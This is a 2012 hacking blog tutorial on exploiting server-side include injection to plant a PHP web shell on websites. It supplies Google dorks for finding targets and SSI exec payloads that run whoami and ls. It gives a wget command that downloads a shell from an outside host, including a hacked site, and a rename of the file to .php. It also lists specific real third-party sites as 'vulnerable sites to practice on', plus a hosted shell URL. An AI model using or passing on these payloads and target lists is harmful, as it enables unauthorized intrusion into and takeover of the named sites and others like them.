Search This Blog

Sunday, December 23, 2012

Upload a shell via SSI injection





Things you will need:

1) Site vulnerable to SSI injection (I will be giving few dorks and few vulnerable sites to practice on)

2) Common sense.
What is SSI?

SSI Injection (Server-side Include) is a server-side exploit technique that allows an attacker to send code into a web application, which will later be executed locally by the web server. SSI Injection exploits a web application's failure to sanitize user-supplied data before they are inserted into a server-side interpreted HTML file.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.

If an attacker submits a Server-side Include statement, he may have the ability to execute arbitrary operating system commands, or include a restricted file's contents the next time the page is served.

Description Taken From: http://nightcode.weebly.com/ssi-injection.html
Chapter I - Finding a vulnerable site

I will provide few dorks for this type of injection.
Best dork i found is


Code:
inurl:bin/Cklb/


but it gave about 863 results so not that usable.

Lets get to work shall we ;)

Enter
Code:
 inurl:bin/Cklb/

in Google and go testing.
Chapter II - Testing a site
So when you used that dork and you opened one site now you must determine id the site is vulnerable to this type of injection.

Here are some command you can use:
Credits: Stewie™
Code:
[/I]
[I]<!--#echo var="DATE_LOCAL" -->[/I]
[I]Will display the Date[/I]
 
[I]<!--#exec cmd="whoami"-->[/I]
[I]Will show which user is running on the server[/I]
 
[I]<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)[/I]
[I]Will display all files in the directory[/I]
 
[I]<!-- #exec cmd="dir" --> (Windows)[/I]
[I]Will display all files in the directory[/I]
[I]


Note: You will need to use the <pre></pre> tags to have some commands executed.

Now take one of the commands and insert it in search boxes or login fields.
Mostly login fields are vulnerable but there is some cases when search boxes are vulnerable.

NOTE: You most enter your command into both fields (If login are vulnerable!!)

I have my site for example:

Code:
[/I]
[I]http://dev.stockphotosamerica.com/bin/Cklb 

PLEASE BE REASONABLE TO THIS SITE.
DO NOT RAPE IT!

And when insert any command:
Code:
[/I]
[I]<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> 


[IMG]

[IMG]

Now we see that our command successfully executed and that our site is vulnerable....
Chapter III - Spawning a shell
So we have our vulnerable site and we are ready to upload a shell.
First of all you will need a .TXT of your favourite shell (Host it somewhere free hosting,hacked site or anything you got)

Now we must download it to our site like this:
Code:
[/I]
[I]<!--#exec cmd="wget http://website.com/dir/shell.txt" --> 


So insert your site where your shell is hosted in the command and you are ready to go.

Now just paste it into the fields and press Login or Enter. 

[IMG]

To see if your .TXT file downloaded execute the command we used before:
Code:
[/I]
[I]<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> 


[IMG]

If you see that it downloaded successfully now you must rename it from .txt to .php!
You can use this command
Code:
[/I]
[I]<!--#exec cmd="mv shell.txt shell.php" --> 


You rename filenames what ever you need (Offcourse you will need to put your .TXT name first.)

My command:
Code:
[/I]
[I]<!--#exec cmd="mv config1.txt config.php" --> 


Now again list the files and try to find your file now.
If you did now just access it.

[IMG]

[IMG]

[IMG]

That would be end of this tutorial.
I hope you learned something and do not rape sites with this 
(Be smart and use them)

Dorks
Credits: Stewie™

Code:
[/I]
[I]inurl:bin/Cklb/ - Best Dork
inurl:login.shtml[/I]
[I]inurl:login.shtm[/I]
[I]inurl:login.stm[/I]
[I]inurl:search.shtml[/I]
[I]inurl:search.shtm[/I]
[I]inurl:search.stm[/I]
[I]inurl:forgot.shtml[/I]
[I]inurl:forgot.shtm[/I]
[I]inurl:forgot.stm[/I]
[I]inurl:register.shtml[/I]
[I]inurl:register.shtm[/I]
[I]inurl:register.stm[/I]
[I]inurl:login.shtml?page= 


Vulnerable site to practice on:
Credits: Dan

Code:
[/I][/LEFT]
[LEFT][I]http://www.glasshouseimages.com/user/login.shtml[/I][/LEFT]
[LEFT][I]http://www.wppionlinecontest.com/user/login.shtml[/I][/LEFT]
[LEFT][I]www.cgibackgrounds.com/user/login.shtml[/I][/LEFT]
[LEFT][I]www.getstock.com/user/login.shtml[/I][/LEFT]
[LEFT][I]www.estostock.com/user/login.shtml[/I][/LEFT]
[LEFT][I]http://www.blendimages.com/user/login.shtml[/I][/LEFT]
[LEFT][I]http://www.pdnthelook.com/user/login.shtml[/I][/LEFT]
[LEFT][I]http://iloveimages.com/user/login.shtml[/I][/LEFT]
[LEFT][I]http://www.win-initiative.com/user/login.shtml (view source to see output)[/I][/LEFT]
[LEFT][I]http://thegatheringsphotocontest.com/user/login.shtml[/I][/LEFT]
[I]


To get a shell up, just wget the shellcode and make the output something such as "shell.txt".

Code:
[/I][/LEFT]
[LEFT][I]http://www.cgibackgrounds.com/Dan.txt



Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

0 comments:

Post a Comment